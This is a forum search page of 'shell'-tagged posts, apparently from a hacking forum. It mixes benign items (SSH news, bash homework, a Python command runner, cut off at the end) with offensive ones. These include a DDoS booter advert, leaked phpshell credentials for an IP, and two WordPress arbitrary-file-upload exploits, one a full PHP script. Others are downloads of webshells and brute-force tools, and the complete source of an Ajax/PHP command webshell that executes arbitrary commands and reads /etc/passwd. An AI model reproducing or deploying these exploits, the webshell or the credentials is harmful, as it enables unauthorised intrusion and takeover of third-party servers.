Showing results for tags 'shell'.

Found 16 results

  1. SEIZURE BOOTER 1.5.0 Features: Time out and port changing Setting Email Spoofer Site to IP File Pumper Cloudflare Resolver Extension Spoofer Boots Shell Its hitting about 700-800 mb Power. Download: DepositFiles
  2. Until now, Unix and Linux system administrators have had to download third-party SSH client software like PuTTY on their Windows machines to securely manage their machines and servers remotely through the Secure Shell protocol or Shell Session (better known as SSH). This might have always been an awkward feature of the Windows platform, as it lacks both a native SSH client for connecting to Linux machines and an SSH server to support inbound connections from Linux machines. But… Believe it or not: You don't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring an OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to the OpenSSH community in an effort to deliver better SSH support in the PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transfer and network port forwarding. This is not the first time Microsoft has planned to adopt SSH for its Windows platform; the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will shortly provide more information on when users can expect SSH support. Source
  3. shadowSQLi

    1 shell

    ======================================= sdad › ???? 157.7.234.128 - phpshell [+]Username: shadow [+]Passowrd: rstforumseboss =======================================
  4. ################################################################################################## #Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility #Author : Manish Kishan Tanwar AKA error1046 #Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ #Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip #Date : 9/04/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server and hence vulnerable to arbitrary file upload //////////////// /// POC //// /////////////// Uploading PHP shell ================================= Just open uploader.php in plugin directory Access Denied browse your php shell and submit it. 
after uploading, you will get your shell in uploads directory at following location http://target.com/wp-content/uploads/i-dump-uploads/ demo:- 404 Not Found and upload your shell --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source: http://packetstorm.wowhacker.com/1504-exploits/wpwdippu-upload.txt
  5. UnixSSH.com – Free shell server provider based on FreeBSD/OpenBSD/NetBSD/Solaris. On our servers you can run IRC bouncers, servers and bots. Also you can found many advanced and standard tools for programming or network diagnostics. Shell environment is very secure and protected from other users (home directory, process, etc.) Shell features: HDD: 400MB MySQL: 100MB RAM: 512MB VRAM: 3500MB Proc: 20 - You can run IRC bot, IRC server, Screen, tmux - Personal website and vhost username.unixssh.com - MySQL (local and remote access) - FTP access - SSH access to shell - Extensive programming environment (C, C++, Perl, Python, JAVA(1.6, 1.7), PHP, Mono) - A lot installed software on shell (Catalyst, Django, Zope, Pylons, Boost C++, nasm, Ruby, Ruby on Rails, Erlang, MongoDB, Apache Maven, Tcl, Lua, Oidentd, Node.js, rhodecode, midnight commander, links, curl, unzip, unrar, unarj, unace, wget, git, cvs, rsync, subversion etc. - irssi, epic5, weechat, screen, tmux, znc, eggdrop, oidentd, psybnc, etc For more information check out our site UnixSSH.com or create account now Host: unixssh.com Port: 44 SSH Login: newx Pass: newx
  6. <?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369 -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl/ # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . 
__plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); Source
  7. I don't know exactly what it does, I found it, I think it's for WP - Shell #!/usr/bin/perl # scanner # (c) Humax use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 5; head(); print "[+] Enter ip - site[(s) file] : "; $choice=<STDIN>; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, "<".$choice) or $!; @paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); $gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] scanner [+] (c) Humax } } https://www.sendspace.com/file/1xlza6
  8. Shell Scanner v1.o is a PHP shell detection script that will scan a server looking for web shells uploaded by other hackers. After locating the path to the shell you can choose the option to SAVE/DELETE. This is useful if you want to save private shells add a backdoor or remove their shit all together keeping full pwnage of the shelled target. Hidden or suspected Shells will be highlighted in blue Click on shell path and Save/Delete shell. Download : http://pastebin.com/bAN9ndkj
  9. I also have a problem with a script; the task goes like this: find all the headers whose names start with a vowel in the directory /usr/src/linux-headers-3.13.0-34/include/ and its subdirectories, then count those that do not include the header linux/err.h and, of the headers they do include, exactly 3 are not found in the linux/ directory or its subdirectories. So far, this is what I have come up with: #! /bin/bash counter=0 for file in $(find /usr/src/linux-headers-3.13.0-34/include/ | grep /[aeiou][a-z0-9_]*[.][h]$); do found=$(cat $file | grep -o "^#include[ *]<linux/err.h>" | wc -l) if [[ "$found" -eq 0 ]]; then count=$((count+1)) fi done First I set a counter = 0, then I find the headers that start with a vowel in the required directory. Then, while I am in one of these files, I run cat on it to get access to what it contains, and I count whether linux/err.h appears in it. If it does, what I saved in the variable found should be 1, and I check whether it is not > 0, and if so, I increment the counter. I hope I was explicit enough; thank you for your attention and help!
  10. A script to work with many types of shells madShell. When adding a shell automatically checks availability and ability to execute shell commands. Now all the commands are executed by POST. In Shell List sorting it is possible to the parameters. Requires PHP + MySQL. Modes: Shell List Stats Add shells Command Execution Logs Automatically determines parameters such as: Safe Mode Platform Version Country Download: http://dl.dropbox.com/u/49340709/t00lz/madShellC0ntr01_v1.2.rar
  11. Hello Friends, I bring these tools I found on the net WebShells 1N73CTION Shell I-47 Shell Ani Shell Indrajith V.2 Shell WSO Shell by Orb Symlink WeeRoot Symlink Sa v3.0 Cpanel Brute Force MySql Interface Download: Mediafire || 4shared Password Zip: deface
  12. Good day, I have 3 problems to solve; if you could help me with at least one of them I would be grateful. 1. Unix shell script that implements the banker's algorithm for multiple resources. 2. Unix shell script that implements the NRU algorithm. 3. Unix shell script that implements the LRU algorithm. Respectfully, lmn
  13. ~# shellhelp Ajax/PHP Command Shell © By Ironfist Version 0.7B The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you're not used to these commands, google a little. Custom Functions If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains 'func name' => 'javascript function'. Take a look at the built-in functions for examples. I know this readme isn't providing too much information, but hell, does this shell even require one - Iron <?php session_start(); error_reporting(0); $password = "password"; //Change this to your password $version = "0.7B"; $functions = array('Clear Screen' => 'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' 
=> "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = '<style type="text/css"> .cmdthing { border-top-width: 0px; font-weight: bold; border-left-width: 0px; font-size: 10px; border-left-color: #000000; background: #000000; border-bottom-width: 0px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #008000; font-family: verdana; border-right-width: 0px; border-right-color: #000000; } input,textarea { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #FFFFFF; background: #000000; border-bottom-width: 1px; border-bottom-color: #FFFFFF; color: #FFFFFF; border-top-color: #FFFFFF; font-family: verdana; border-right-width: 1px; border-right-color: #FFFFFF; } A:hover { text-decoration: none; } table,td,div { border-collapse: collapse; border: 1px solid #FFFFFF; } body { color: #FFFFFF; font-family: verdana; } </style>'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "<b>".get_current_user()."~# </b>". 
htmlspecialchars($cmd)."<br>"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '<br>Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "<br><b>I can write to this directory</b>"; } else { print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>"; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '<b><font size=7>Ajax/PHP Command Shell</b></font> © By Ironfist The shell can be used by anyone to command any server, the main purpose was to create a shell that feels as dynamic as possible, is expandable and easy to understand. If one of the command execution functions work, the shell will function fine. Try the "canirun" command to check this. Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re not used to these commands, google a little. <b>Custom Functions</b> If you want to add your own custom command in the Quick Commands list, check out the code. The $function array contains \'func name\' => \'javascript function\'. Take a look at the built-in functions for examples. 
I know this readme isn\'t providing too much information, but hell, does this shell even require one - Iron '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">"; $contents = file($file[1]); foreach($contents as $line) { print htmlspecialchars($line); } print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.<br>"; if(function_exists(passthru)) { print "Passthru: <b><font color=green>Enabled</b></font><br>"; } else { print "Passthru: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(exec)) { print "Exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Exec: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(system)) { print "System: <b><font color=green>Enabled</b></font><br>"; } else { print "System: <b><font color=red>Disabled</b></font><br>"; } if(function_exists(shell_exec)) { print "Shell_exec: <b><font color=green>Enabled</b></font><br>"; } else { print "Shell_exec: <b><font color=red>Disabled</b></font><br>"; } print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>"; if( ini_get('safe_mode') ){ print "Safe Mode: <b><font color=red>Enabled</b></font>"; } else { print "Safe Mode: <b><font color=green>Disabled</b></font>"; } print "<br><br>Open_basedir will 
block access to some files you <i>shouldn't</i> access.<br>"; if( ini_get('open_basedir') ){ print "Open_basedir: <b><font color=red>Enabled</b></font>"; } else { print "Open_basedir: <b><font color=green>Disabled</b></font>"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."<br>"; print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>"; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "<td>"; foreach($dirs as $directory) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>"; } print "</td><td>"; foreach($filez as $file) { print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>"; } print "</td></table>"; } } elseif(strtolower($cmd) == "about") { print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "<b>Free:</b> $free / $total 
MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."<br>"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> <html> <title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title> <head> <?php print $style; ?> <SCRIPT TYPE="text/javascript"> function sf(){document.cmdform.command.focus();} var outputcmd = ""; var cmdhistory = ""; function ClearScreen() { outputcmd = ""; document.getElementById('output').innerHTML = outputcmd; } function ClearHistory() { cmdhistory = ""; document.getElementById('history').innerHTML = cmdhistory; } function deletefile(file) { deleteit = window.confirm("Are you sure you want to delete\n"+file+"?"); if(deleteit) { runcommand('deletefile ' + file,'GET'); } } var http_request = false; function makePOSTRequest(url, parameters) { http_request = false; if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { 
http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function SaveFile() { var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) + "&filecontent=" + encodeURI( document.getElementById("area1").value ); makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr); document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly."; } function runcommand(urltoopen,action,contenttosend){ cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory; document.getElementById('history').innerHTML = cmdhistory; if(urltoopen == "clear") { ClearScreen(); } var ajaxRequest; try{ ajaxRequest = new XMLHttpRequest(); } catch (e){ try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ alert("Wicked error, nothing we can do about it..."); return false; } } } ajaxRequest.onreadystatechange = function(){ if(ajaxRequest.readyState == 4){ outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>"; document.getElementById('output').innerHTML = outputcmd; var objDiv = document.getElementById("output"); objDiv.scrollTop = objDiv.scrollHeight; } } ajaxRequest.open(action, "?runcmd="+urltoopen , true); if(action == "GET") { ajaxRequest.send(null); } document.cmdform.command.value=''; return false; } function set_tab_html(newhtml) { 
document.getElementById('commandtab').innerHTML = newhtml; } function set_tab(newtab) { if(newtab == "cmd") { newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>'; } else if(newtab == "upload") { runcommand('upload','GET'); newhtml = '<font size=0><b>This will reload the page... </b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>'; } else if(newtab == "workingdir") { <?php $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\""; $pathparts = explode("/",realpath (".")); foreach($pathparts as $folder) { $folders .= $folder."/"; } $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>"; ?> newhtml = '<?php print $folders; ?>'; } else if(newtab == "filebrowser") { newhtml = '<b>File browser is under construction! 
Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory'; runcommand('listdir .','GET'); } else if(newtab == "createfile") { newhtml = '<b>File Editor, under construction.</b>'; document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } document.getElementById('commandtab').innerHTML = newhtml; } </script> </head> <body bgcolor=black onload="sf();" vlink=white alink=white link=white> <table border=1 width=100% height=100%> <td width=15% valign=top> <form name="extras"><br> <center><b>Quick Commands</b><br> <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'> <?php foreach($functions as $name => $execute) { print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>'; } ?> </center> </div> </form> <center><b>Command history</b><br></center> <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div> <br> <center><b>About</b><br></center> <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'> <br> <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist <br> Version <?php print $version; ?> <br> <br> <br>Thanks to everyone @ <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a> <br> <a href="http://www.milw0rm.com" target=_blank>milw0rm</a> <br> and special greetings to everyone in rootshell </div> </td> <td width=70%> <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0> <b style="cursor:crosshair" 
onclick="set_tab('cmd');">[Execute command]</b> <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> </font></td> <tr> <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div> <tr> <td height=1% width=100% valign=top> <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'> <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');"> <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br> </form> </div> </td> </table> </td> </table> </body> </html> <?php } } else { print "<center><table border=0 height=100%> <td valign=middle> <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\"> </form>"; } ?>
  14. This cross-platform script runs a batch/bash command with variable parameters taken from text files, line by line. I felt the need to make something more general precisely because of the many topics and requests on this subject. No matter how many commands you run, all the output is displayed in real time in the same console (or also in a file) without getting mixed up (it is assumed that you use commands of the same kind that generate qualitative rather than quantitative output), and command dispatch is very stable, strictly respecting the number of allocated threads and the time-based ordering. The code is pure Python; even the command execution is done in separate processes independent of the terminal, which prevents shell injection and other annoyances, at the cost of restricting some typical bash "tricks", but this behavior can be changed by modifying and adding an argument of the Popen class; anyway, I won't go into details, because it is out of scope and I don't think you will run into this problem. It uses Python 2.x, tested on Windows 7 and BackTrack with a simple program like: #include <stdio.h> #include <time.h> #include <windows.h> #define N 10 /* N phases */ int main(int argc, char* argv[]) { int i; for (i = 0; i < N; ++i) { printf("Process %s with %s at phase %d.\n", argv[1], argv[2], i); fflush(stdout); Sleep(1000); /* replace with sleep(1) on posix */ } return 0; } Test parameters taken from 2 files via the line: run.py -t 2 -d 0.5 scan.exe @a.txt @b.txt P.S.: Pay attention to the output; picture roughly what the thing you are about to do will look like, so you don't get any surprises. cd into the folder with the script chmod +x ./run.py ./run.py -> see usage http://codepad.org/tn3Xwohw #! /usr/bin/env python # Shell Multi Runner # 12.02.2012 cmiN # # Execute commands in terminal asynchronously using subprocess # and show all output merged into one console. 
# # Contact: cmin764@yahoo/gmail.com import subprocess # better than popen/system/respawn from sys import argv, stdout from time import sleep from threading import active_count, Thread # parallelism # some settings FILE = None # output to file too THRD = 10 # threads DLAY = 1 # delay CHAR = '@' # wildcard # instantiated in only one object class Show(file): """ Thread safe printing class. Uses primitive locks. """ def __init__(self, fname=None): """ If `fname` isn't `None` write output to file too. """ self.locked = False # unlocked self.open_file(fname) def __del__(self): """ Destructor. Close an opened file. """ if self.fname: self.close() def open_file(self, fname): """ Open file for writing. """ self.fname = fname if fname: # init file super(Show, self).__init__(fname, 'w') def write(self, data): """ Safe write. """ while self.locked: # if writing in progress pass # wait # lock self.locked = True # write data if self.fname: super(Show, self).write(data) stdout.write(data) # flush data if self.fname: self.flush() stdout.flush() # release self.locked = False def fileno(self): """ Experimental. Used as file descriptor replacing pipes. """ if self.fname: return super(Show, self).fileno() return stdout.fileno() class Engine(Thread): """ Execute each command in a separate thread and listen for it's output. """ def __init__(self, command): super(Engine, self).__init__() # superclass constructor self.command = command def run(self): """ Function called from outside by `start` method. 
""" # fork the fucking process pobj = subprocess.Popen(self.command.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # listen for new input while True: line = pobj.stdout.readline() if line == "": # more output it's about to come if pobj.poll() != None: # nope break # so exit continue # try again report.write(line) # globals usage = """ Usage: {0} [options] command Options: -t, --threads <int> how many asynchronous threads to run -d, --delay <float> time in seconds to wait between each run -f, --file <str> write output to file too Commands: <any valid command> ex: wget {1}links.txt If you preceed a parameter with {1} it becomes a list with parameters taken from a file called like itself. Old: ./scan -h 91.202.91.119 -u usr.txt -p pwd.txt New: {0} ./scan -h {1}hosts.txt -u usr.txt -p pwd.txt """.format(argv[0], CHAR) report = Show() # make verbose object def generate(command, expand, pos): """ Format command recursively. """ if pos == len(expand): # now command string is complete sleep(DLAY) # delay while active_count() > THRD: pass # wait if number of threads is exceeded report.write("[+] Start: %s\n" % command) Engine(command).start() return expand[pos].seek(0) # rewind for line in expand[pos]: generate(command.replace("{%d}" % pos, line.strip()), expand, pos + 1) def main(): global FILE, THRD, DLAY, CHAR # check if len(argv) == 1 or argv[1] in ('-h', "--help"): print usage return # insuficient parameters # parse report.write("[+] Parsing...\n") argv.pop(0) # remove script name command = "" ind = 0 # index expand = [] # list with special parameters while ind < len(argv): if argv[ind] in ('-t', "--threads"): ind += 1 THRD = int(argv[ind]) elif argv[ind] in ('-d', "--delay"): ind += 1 DLAY = float(argv[ind]) elif argv[ind] in ('-f', "--file"): ind += 1 FILE = argv[ind] report.open_file(FILE) elif argv[ind][0] == CHAR: # reserve variable parameter for special ones command += ' ' + "{%d}" % (len(expand)) # add to list special parameters 